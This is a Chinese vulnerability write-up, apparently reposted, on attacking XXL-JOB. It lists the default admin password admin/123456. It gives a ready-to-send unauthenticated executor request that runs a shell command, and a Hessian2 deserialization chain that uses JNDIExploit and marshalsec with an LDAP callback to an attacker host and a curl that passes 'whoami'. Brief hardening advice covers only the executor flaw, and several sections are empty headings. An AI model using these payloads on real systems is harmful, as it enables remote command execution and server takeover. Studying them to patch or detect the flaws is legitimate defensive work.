简介
后台弱口令
路径
http://127.0.0.1:8080/toLoginhttp://127.0.0.1:8080/xxl-job-admin/toLogin
口令
admin/123456整改建议
后台任务中心任意命令执行
复现
executor 未授权访问致远程命令执行漏洞
影响版本
复现
POST /run HTTP/1.1Host: your-ip:9999Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 365{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "touch /tmp/success","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}
整改建议
针对该问题,现提供几种安全防护策略。
1、开启 XXL-JOB 自带的鉴权组件:官方文档中搜索 “xxl.job.accessToken” ,按照文档说明启用即可。
2、端口防护:及时更换默认的执行器端口,不建议直接将默认的9999端口开放到公网。
3、端口访问限制:通过配置安全组限制只允许指定IP才能访问执行器9999端口。
未授权 Hessian2反序列化
http://127.0.0.1:8080/apihttp://127.0.0.1:8080/xxl-job-admin/api
影响版本
复现
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i x.x.x.x -l 1389java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor ldap://x.x.x.x:1389/Basic/TomcatEcho > test.sercurl -XPOST -H "Content-Type: x-application/hessian" -H "cmd: whoami" --data-binary @test.ser http://127.0.0.1:8080/api整改建议
参考链接
https://xz.aliyun.com/t/11091扫码加群
公众号新功能可自行探索
文章来源: http://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247486425&idx=2&sn=c56daaf7715162058c275a4e94cd86a8&chksm=c0888e93f7ff07856607a99073a2ebdf69aec2f145ade05430b6d9fb60845f7cfc93b3957657#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh